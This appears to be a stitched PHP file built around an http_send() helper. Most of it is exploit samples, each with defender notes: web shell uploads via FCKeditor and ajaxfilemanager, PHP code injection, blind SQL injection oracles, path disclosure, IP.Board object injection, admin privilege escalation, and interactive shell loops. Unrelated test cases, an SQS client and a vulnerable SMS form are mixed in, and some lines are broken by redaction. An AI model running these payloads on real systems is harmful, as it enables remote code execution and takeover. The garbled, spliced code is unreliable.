/**
 * Exploit-corpus sample: tries to place a PHP web shell through the FCKeditor
 * "mcpuk" connector (Command=FileUpload), cycling through $file_ext so the
 * filename ends in an allowed extension (sh.php.<ext>) while still carrying
 * ".php" earlier in the name. The uploaded body executes whatever base64 value
 * arrives in the `Cmd` request header and brackets its output with "_code_";
 * the probe GET checks for that marker to decide the extension worked.
 * Reads globals $host/$path and calls http_send(), both defined elsewhere.
 *
 * Defender notes: reject multiple extensions and serve upload directories with
 * script execution disabled; alert on multipart filenames matching /\.php\./i,
 * on requests carrying a `Cmd:` header, and on upload bodies containing
 * "$_SERVER[HTTP_" / passthru(. Returns the working extension or false.
 */
function upload() { global $host, $path; $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"; $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); foreach ($file_ext as $ext) { print "\n[-] Trying to upload with .{$ext} extension..."; $data = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n"; $data .= "--12345--\r\n"; $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) { die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n"); } $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) { return $ext; } sleep(1); } return false; }
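/**
 * Integration case: uploads the sample .dat file that sits next to this test
 * to the ulog upload endpoint and expects {"errno":0} back.
 *
 * Fix: the previous version placed `".dirname(__FILE__)."` INSIDE the JSON
 * string literal, so the literal text `".dirname(__FILE__)."` ended up in the
 * JSON, json_decode() returned null and the request went out with no fields.
 * The fields are now built as an array directly, which is what the decoded
 * JSON would have produced.
 *
 * NOTE(review): the leading "@" on datafile looks like the legacy cURL
 * CURLOPT_POSTFIELDS file-upload marker — confirm against http_send(); if it
 * is, never pass caller-controlled values through that field unescaped.
 */
protected function execute()
{
    $datafile = dirname(__FILE__) . '/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat';
    $postParam = array(
        'ver' => '2',
        'pd' => 'map',
        'im' => '2',
        'os' => 'android',
        'datafile' => '@' . $datafile,
    );
    $data = http_send('http://10.99.33.39:8202/ulog/public/up.php', $postParam);
    $res = '{"errno":0}';
    $this->assert_json(__LINE__, $data, $res);
}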
/**
 * Integration case: uploads a fixed sample .dat file (absolute path on the
 * test host) to the ulog upload endpoint and expects {"errno":0} back.
 *
 * NOTE(review): the leading "@" on datafile looks like the legacy cURL
 * CURLOPT_POSTFIELDS file-upload marker — confirm against http_send().
 */
protected function execute()
{
    $requestJson = '{"ver":"2","pd":"map","im":"2","os":"android","datafile":"@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat"}';
    $fields = json_decode($requestJson, true);
    $response = http_send('http://10.99.33.39:8202/ulog/public/up.php', $fields);
    $expected = '{"errno":0}';
    $this->assert_json(__LINE__, $response, $expected);
}
/**
 * Integration case: uploads the 20130913100335.dat sample that sits next to
 * this test to the ulog upload endpoint and expects {"errno":0} back.
 *
 * NOTE(review): the leading "@" on datafile looks like the legacy cURL
 * CURLOPT_POSTFIELDS file-upload marker — confirm against http_send().
 */
protected function execute()
{
    $datafile = __DIR__ . '/20130913100335.dat';
    $fields = json_decode('{"ver":"2","pd":"map","im":"2","os":"android","datafile":"@' . $datafile . '"}', true);
    $response = http_send('http://10.99.33.39:8202/ulog/public/up.php', $fields);
    $this->assert_json(__LINE__, $response, '{"errno":0}');
}
/**
 * Exploit-corpus sample: boolean oracle for a blind SQL injection. The
 * attacker-built SQL fragment is sent in the `Referer` header; the function
 * returns true when the page answers with "DENIED". Reads globals $host/$path
 * and calls http_send(), defined elsewhere. The `? true : false` is redundant.
 *
 * Defender notes: Referer values that are logged or stored must be bound as
 * parameters, never interpolated; alert on SQL keywords in request headers.
 */
function check_query($sql) { global $host, $path; $packet = "GET {$path} HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$sql} \r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $packet); return preg_match("/DENIED/", $html) ? true : false; }
/**
 * Exploit-corpus sample: full-path disclosure. Requests tiki-rss_error.php
 * directly and scrapes the absolute path out of the PHP error message
 * ("in <b>/path/to/tiki-rss..."); dies when no path is echoed.
 * Reads globals $host/$path and calls http_send(), defined elsewhere.
 *
 * Defender notes: display_errors=Off in production removes the disclosure;
 * the leaked path is the prerequisite for later file-write steps.
 */
function get_path() { global $host, $path; $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) { die("\n[-] Path not found!\n"); } return $m[1]; }
/**
 * Exploit-corpus sample: full-path disclosure via direct access to a Docebo
 * include file (class.conf_fw.php). The substr/strstr arithmetic keeps the
 * part of the echoed path before "docebo" and appends $path minus its leading
 * slash. $found[1] is used unchecked: with no match this yields notices and
 * an empty prefix. Reads globals $host/$path; http_send() is defined elsewhere.
 *
 * Defender notes: display_errors=Off and denying direct requests to include
 * files close this; alert on requests to class/*.php outside the front controller.
 */
function get_path() { global $host, $path; $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found); $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo"))); $ret .= substr($path, 1); return $ret; }
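/**
 * Send $data to the SQS queue configured in $config as one SendMessage call.
 *
 * The request is SigV4-signed by __sqs_client_version_four() and posted with
 * http_send(); the XML reply is parsed for the MessageId.
 *
 * Changes from the previous version:
 *  - the XML reply is parsed WITHOUT LIBXML_NOENT. The body is network input,
 *    and entity substitution would let a crafted reply expand external
 *    entities (XXE); LIBXML_NONET additionally stops libxml from fetching
 *    anything over the network.
 *  - the signer is given the same region that is written into the
 *    Credential scope of the Authorization header; previously the signature
 *    always used s3_region while the scope could name sqs_region, which
 *    cannot validate when the two differ.
 *  - libxml errors are collected and cleared instead of @-suppressed.
 *
 * @param mixed $data   Anything json_encode() accepts; becomes MessageBody.
 * @param array $config Keys read here: sqs_queue_url, aws_access_key_id,
 *                      aws_secret_access_key, s3_region, sqs_region (optional,
 *                      falls back to s3_region, then us-east-1), log_api_response.
 * @return array ['id' => MessageId] on success, otherwise ['error' => message].
 *               Never throws; every failure is reported through 'error'.
 */
function sqs_client_enqueue($data, $config)
{
    $result = array();
    $err = '';

    $variables = array(
        'Action' => 'SendMessage',
        'MessageBody' => json_encode($data),
        'Version' => '2012-11-05',
    );

    $parsed_url = parse_url($config['sqs_queue_url']);
    $headers = array();
    $headers['Host'] = strtolower($parsed_url['host']);
    $headers['X-Amz-Date'] = gmdate(DATE_FORMAT_ISO8601_BASIC);

    // Region of the queue: explicit sqs_region, else the S3 bucket's region,
    // else the SigV4 default. Resolved before signing so the signature and the
    // Credential scope below agree.
    if (!empty($config['sqs_region'])) {
        $region = $config['sqs_region'];
    } elseif (!empty($config['s3_region'])) {
        $region = $config['s3_region'];
    } else {
        $region = 'us-east-1';
    }

    $signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $region, 'post');
    $date_str = substr($headers['X-Amz-Date'], 0, 8);
    $headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}";

    $post_result = http_send($config['sqs_queue_url'], $variables, $headers);
    $body = $post_result['result'];
    $log_response = !empty($config['log_api_response']);
    if ($body && $log_response) {
        log_file("sqs response:\n" . print_r($body, 1), $config);
    }

    if ($post_result['error']) {
        $err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error'];
    } elseif (!$body) {
        $err = 'Got no response from sqs request';
    } else {
        // No LIBXML_NOENT (see header comment); errors are swallowed on purpose
        // because a malformed body is reported through $err, not thrown.
        $prev = libxml_use_internal_errors(true);
        $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
        libxml_clear_errors();
        libxml_use_internal_errors($prev);

        if (!is_object($xml)) {
            $err = 'Could not parse sqs response';
        } elseif (count($xml->Error)) {
            // Log the raw body on error even when response logging is off,
            // unless it was already logged above.
            if (!$log_response) {
                log_file("sqs response:\n" . $body, $config);
            }
            $err = 'Got error in sqs response';
        } elseif (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) {
            $err = 'Got no MessageId in sqs response';
        } else {
            $result['id'] = (string) $xml->SendMessageResult->MessageId;
        }
    }

    if ($err) {
        $result['error'] = $err;
    }
    return $result;
}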
/**
 * Exploit-corpus sample: boolean oracle for a blind SQL injection through the
 * `Via` proxy header on a guestbook insert (index.php?option=guestbook). It
 * returns true when the response does NOT echo the injected "UNION/**&#47;SELECT"
 * text back. Reads globals $host/$path; http_send() is defined elsewhere.
 *
 * Defender notes: proxy headers (Via, X-Forwarded-For) that are persisted with
 * the entry must be bound as parameters; alert on SQL keywords in such headers.
 */
function check_query($sql) { global $host, $path; $payload = "gb_name=null&gb_email=foo%40bar.com&task=insert"; $packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Via: {$sql}\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet)); }
/**
 * Exploit-corpus sample: sends PHP source as the `p_user` value of the admin
 * login form, which implies the target writes that field into a file it later
 * executes (a log or config written as PHP). The injected code runs the base64
 * command from the `Cmd` request header. Reads globals $host/$path;
 * http_send() is defined elsewhere.
 *
 * Corpus artifact: the `"******"` token is a secret-redaction placeholder that
 * swallowed the end of $payload and the start of the `$packet = "POST ...`
 * statement, so this line is not syntactically valid as shown.
 *
 * Defender notes: never persist request data into files with a .php extension
 * or into files that get include()d; alert on "<?php" in POST bodies.
 */
function inject_code() { global $host, $path; $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>"; $payload = "p_user={$code}&p_pass="******"POST {$path}admin/index.php?action=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; http_send($host, $packet); }
/**
 * Exploit-corpus sample: authenticated code injection through a user
 * preference. `feed_order` breaks out of the string/array context in which the
 * target serialises preferences as PHP source (set-prefs.php), appending a
 * passthru() of the base64 command carried in the `Cmd` header; "%23" (#)
 * comments out the remainder. Auth is supplied via user_name /
 * user_password_hash cookies from globals; a redirect to login.php means the
 * credentials were rejected. http_send() is defined elsewhere.
 *
 * Defender notes: store preferences as data (JSON/serialised values in a DB),
 * never as generated PHP; alert on "passthru(" / "$_SERVER[HTTP_" in form fields.
 */
function inject_php() { global $host, $path, $user, $pass; $data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23"; $packet = "POST {$path}set-prefs.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; if (preg_match("/login.php/", http_send($host, $packet))) { die("\n[-] Incorrect username or password!\n"); } }
/**
 * Exploit-corpus sample: posts the global $username/$password to
 * index.php?a=login and returns whether the response matches $pattern.
 * Reads globals $host/$path/$username/$password; http_send() is defined
 * elsewhere.
 *
 * Corpus artifact: the `"******"` inside $pattern is a secret-redaction
 * placeholder; the original success marker cannot be recovered from this line,
 * and as written the regex is not a valid PHP expression.
 */
function login() { global $host, $path, $username, $password; $data = "user={$username}&pass={$password}&submit=1&request_uri=foo"; $packet = "POST {$path}index.php?a=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; $pattern = "/pass="******"/"; return preg_match($pattern, http_send($host, $packet)); }
/**
 * Exploit-corpus sample: SQL error disclosure used as a fingerprint. A lone
 * single quote in `album_name` makes slideshow_full.php echo the failing query,
 * from which the table prefix is captured into the global $prefix for the
 * later injection steps. The die() message attributes a miss to
 * magic_quotes_gpc. Reads globals $host/$path; http_send() is defined elsewhere.
 *
 * Defender notes: never echo database errors to clients; bind parameters
 * rather than rely on magic quotes (removed in PHP 5.4).
 */
function check_target() { global $host, $path, $prefix; print "\n[-] Checking {$host}..."; $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) { print "vulnerable!\n"; } else { die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); } $prefix = $match[1]; }
/**
 * Exploit-corpus sample: injects "(SELECT/**&#47;1)" into the `order` parameter
 * of new_images.php (an ORDER BY clause) to confirm the MySQL server accepts
 * subqueries before the real injection; the page is considered healthy when
 * the footer marker "The LinPHA developers" is present. Note the bare
 * strpos() truthiness test treats a match at offset 0 as "not found".
 * Reads globals $host/$path; http_send() is defined elsewhere.
 *
 * Defender notes: ORDER BY cannot be parameterised — allow-list column names;
 * alert on "SELECT" inside sort/order query parameters.
 */
function check_target() { // see if MySQL version is >= 4.1 (subqueries support) or other error global $host, $path; print "\n[-] Checking {$host}..."; $pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n"; $pck .= "Host: " . $host . "\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $buff = http_send($host, $pck); if (!strpos($buff, "The LinPHA developers")) { die("\n\n[-] Error... Probably wrong MySQL version!\n"); } else { print " OK!\n"; } }
/*
 * Exploit-corpus sample (Dolphin). Flow as written: log in through member.php
 * and scrape memberID / memberPassword from the response; then pass PHP code in
 * the `bubbles` parameter of member_menu_queries.php, where it is evidently
 * evaluated, and loop reading shell commands from STDIN which travel base64
 * encoded in a `Cmd` request header. Expects http_send() from earlier in the
 * file. $argv['0'] (string key) resolves to the script name as a quirk of
 * array key normalisation.
 *
 * Defender notes: alert on "passthru(" / "base64_decode($_SERVER[HTTP_" in
 * query strings and on requests carrying a `Cmd:` header; session identifiers
 * embedded in page bodies are trivially harvested once a login succeeds.
 */
print "\n+------------------------------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n"; print "\nExample....: php {$argv['0']} localhost / user pass"; print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "ID={$argv[3]}&Password={$argv[4]}"; $packet = "POST {$path}member.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) { die("\n[-] Login failed!\n"); } $phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])"; $packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\ndolphin-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
/**
 * Exploit-corpus sample: creates a uniquely named folder under $rootdir through
 * the file manager's ajax_create_folder.php without any visible authentication
 * and returns the name for later steps. Reads globals $host/$path/$fileman/
 * $rootdir; http_send() is defined elsewhere.
 *
 * Corpus artifact: "¤tFolderPath" is "&currentFolderPath" after an HTML
 * entity decoder turned "&curren" into "¤", so the payload as shown is broken.
 *
 * Defender notes: file-manager AJAX endpoints must enforce the same session
 * checks as the UI; alert on unauthenticated POSTs to ajax_create_folder.php.
 */
function random_mkdir() { global $host, $path, $fileman, $rootdir; $dirname = uniqid(); $payload = "new_folder={$dirname}¤tFolderPath={$rootdir}"; $packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); return $dirname; }
/*
 * Fragment: the leading `return stream_get_contents($sock); }` is the tail of
 * the http_send() helper whose body is cut off before this line.
 *
 * Exploit-corpus sample (aidiCMS): the tinymce ajaxfilemanager's
 * ajax_create_folder.php evidently writes request data into inc/data.php, so a
 * PHP web shell posted in the `foo` field becomes executable at that path; the
 * loop then sends base64 commands in a `Cmd` header and prints whatever follows
 * the "_code_" marker.
 *
 * Defender notes: config/data files generated from request input must not be
 * PHP; alert on "<?php" in POST bodies and on requests carrying a `Cmd:` header.
 */
return stream_get_contents($sock); } print "\n+-----------------------------------------------------+"; print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |"; print "\n+-----------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php {$argv['0']} <host> <path>\n"; print "\nExample....: php {$argv['0']} localhost /"; print "\nExample....: php {$argv['0']} localhost /aidicms/\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\naidicms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
/*
 * Fragment: this line starts mid-script — $headers, $payload, $newuser,
 * $newpass, $cookie and $path come from lines not shown, and http_send() here
 * takes (host, port, headers) and returns a stream read by http_recv(), unlike
 * the two-argument helper used by the other samples on this page.
 *
 * Exploit-corpus sample: privilege escalation. With an AUTH_COOKIE value it
 * lists admin/review/staff/index.php, takes the highest user id found in
 * "php?u=N" links, and posts to admin/edit/index.php?u=N with chk_admin=on to
 * grant that account admin rights; the cleartext credentials are printed at
 * the end. sleep(2) calls pace the requests.
 *
 * Defender notes: authorise the acting session on the edit endpoint, not only
 * on the page that links to it; alert on "chk_admin=on" from sessions that are
 * not already administrators, and on AUTH_COOKIE values reused across clients.
 */
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n"; $headers .= $payload; fclose(http_send($host, 80, $headers)); sleep(2); print "Granting admin privileges for user [ {$newuser} ]\n"; $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n"; $headers .= "Host: {$host}\r\n"; $headers .= "Connection: close\r\n"; $headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n"; preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches); if (!is_numeric(max($matches[1]))) { die('Failed.'); } sleep(2); $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes'); $headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n"; $headers .= "Host: {$host}\r\n"; $headers .= "Connection: close\r\n"; $headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n"; $headers .= "Content-Type: application/x-www-form-urlencoded\r\n"; $headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n"; $headers .= $payload; fclose(http_send($host, 80, $headers)); print "Success!\n\n"; print "http://{$host}{$path}login.php\n"; print "user: {$newuser}\n"; print "pass: {$newpass}\n"; ?> # ### [ dun / 2012 ] ###############################
/**
 * Exploit-corpus sample (php-stats): flips the admin "write files on server"
 * preference. It fetches admin.php?action=preferenze with the pass_cookie from
 * global $pwd, detects the current mode by matching the Italian or English UI
 * string ($s1 / $s2), and when the writable mode is reported posts
 * `change_mode=1` to admin.php. Reads globals $host/$path/$prefix/$pwd;
 * http_send() is defined elsewhere.
 *
 * Defender notes: a state-changing admin action driven by one POST field and a
 * cookie, with no anti-CSRF token visible; alert on "change_mode=" posts to
 * admin.php outside interactive admin sessions.
 */
function set_NowritableServer() { global $host, $path, $prefix, $pwd; // we need to set $NowritableServer=1 in /option/php-stats_mode.php $s1 = "/con scrittura di files sul Server/"; $s2 = "/the write files on server mode/"; $pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Cookie: pass_cookie={$pwd}\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $pck); if (preg_match($s1, $html) || preg_match($s2, $html)) { $data = "change_mode=1"; $pck = "POST {$path}admin.php HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Content-Type: application/x-www-form-urlencoded\r\n"; $pck .= "Content-Length: " . strlen($data) . "\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $pck .= $data; http_send($host, $pck); } }
/*
 * Fragment: this line starts mid-script — $packet, $data, $host and $path are
 * built on lines not shown; http_send() is defined elsewhere.
 *
 * Exploit-corpus sample: the tail of an FCKeditor-style upload (the
 * OnUploadCompleted(code, "name", "file", …) callback is parsed; code 0 or 201
 * means accepted), followed by an interactive loop that fetches
 * datacenter/media/<uploaded file> with a base64 command in the `Cmd` header
 * and prints the text between "_code_" markers. `define(STDIN, …)` uses a bare
 * constant as the name and re-opens stdin for the CLI.
 *
 * Defender notes: serve upload directories without script execution; alert on
 * requests carrying a `Cmd:` header and on responses containing "_code_".
 */
$packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) { die("\n[-] Upload failed! (Error {$html[1]})\n"); } else { print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; } define(STDIN, fopen("php://stdin", "r")); while (1) { print "\nstack-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: " . base64_encode($cmd) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (eregi("print", $output) || !eregi("_code_", $output)) { die("\n[-] Exploit failed...\n"); } $shell = explode("_code_", $output); print "\n{$shell[1]}"; } else { break; } } ?> # milw0rm.com [2008-05-29]
<?php /*
 * SMS sending form (legacy register_globals style: $submit, $to, $text and
 * $PHP_SELF are expected to appear as globals from the request).
 *
 * Review notes, in order of severity:
 *  - $text, $to and $PHP_SELF are echoed into HTML unescaped (the message
 *    line, and the form's action attribute) — reflected XSS. Wrap each with
 *    htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') at output.
 *  - $to is placed in the sendsms URL without urlencode(), unlike $text, so a
 *    crafted number can add or override query parameters of the gateway call.
 *  - The `echo $sendTo; echo "<hr>"; echo $message; exit;` sequence looks like
 *    leftover debugging: it makes everything after it unreachable.
 *  - The `"******"` tokens are secret-redaction placeholders that replaced the
 *    gateway username/password constants; the $URL line is not valid as shown.
 */ ?>
<head> <title>SMS Message Sender</title> </head> <body bgcolor="#FFFFFF" text="#000000"> <?php include "config.inc"; include "functions.inc"; echo $sendTo; echo "<hr>"; echo $message; exit; if ($submit) { echo "Sending the SMS Text message <b>\"{$text}\"</b> to the phone <b>{$to}</b>...<br>\n"; $URL = "/cgi-bin/sendsms?username="******"&password="******"&from=" . GLOBAL_SENDER . "&to={$to}&text=" . urlencode($text); http_send($URL, SENDSMS_PORT); echo "<address><a href=\"{$PHP_SELF}\">Back to Send SMS</a></address>\n"; } else { ?> <h1>SMS Message Sender</h1> <form name="sendsms" method="post" action="<?php echo "{$PHP_SELF}"; ?> "> <p> Telephone number: <br> <input type="text" size="30" name="to"> </p> <p>
/*
 * Fragment: $host and $path are set on lines not shown; http_send() is defined
 * elsewhere.
 *
 * Exploit-corpus sample (IP.Board): PHP object injection. The member_id
 * cookie is evidently unserialize()d by the target; the payload is a
 * serialised db_driver_mysql object whose `obj` settings enable the query
 * debug log and point it at cache/sh.php. A request whose query string
 * contains PHP code then gets written into that log, which is afterwards
 * requested directly as a web shell driven by the `Cmd` header. The local
 * `class db_driver_mysql` mirrors the gadget's shape but is unused at runtime
 * (the payload is a literal string). "O:+15" is the "super bypass" noted in
 * the code: a signed object length that evades naive "O:" filters.
 * The short_open_tag check: if "<?error" comes back verbatim the shell's
 * short tag was not parsed.
 *
 * Defender notes: never unserialize() cookie or request data; alert on
 * "O:" / "O:+" followed by a class name in cookie values, and on "passthru("
 * in query strings; debug-log paths must not be attacker-controllable.
 */
$packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } # Super bypass by @i0n1c $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}'); $phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\\?error/', http_send($host, $packet))) { die("\n[-] short_open_tag disabled!\n"); } while (1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
/**
 * Integration case: registers a slave with the loc-monitor service using a
 * fixed cuid/ts/sign triple and expects the canned sid in the JSON reply.
 *
 * NOTE(review): the cuid value contains a literal space and "|"; it is sent
 * un-encoded exactly as in the original case — confirm that is intended.
 */
protected function execute()
{
    $endpoint = 'http://10.99.33.40:8080/loc-monitor/slave.php'
        . '?type=reg&ts=10982345&sign=cc'
        . '&cuid=SLAVE3559A98E6E0894F17F08F4877CD|933 861000141225'
        . '&os=android&pt=1&ap=map';
    $response = http_send($endpoint, '');
    $expected = '{"error":0,"msg":"","data":{"sid":"25ce7a038f015df67e96231000141225"},"t":23}';
    $this->assert_json(__LINE__, $response, $expected);
}
/**
 * Exploit-corpus sample: multipart upload of a PHP web shell (poc.php) through
 * ?L=interact.file&id=0, then a directory listing of system/cache/temp/ to
 * learn the timestamp-prefixed name the server stored it under; returns that
 * name or dies when listing is denied. The shell runs the base64 command from
 * the `Cmd` header. Reads globals $host/$path; http_send() is defined elsewhere.
 *
 * Defender notes: keep uploads outside the document root (or deny execution
 * there) and disable directory indexes; alert on multipart filenames ending
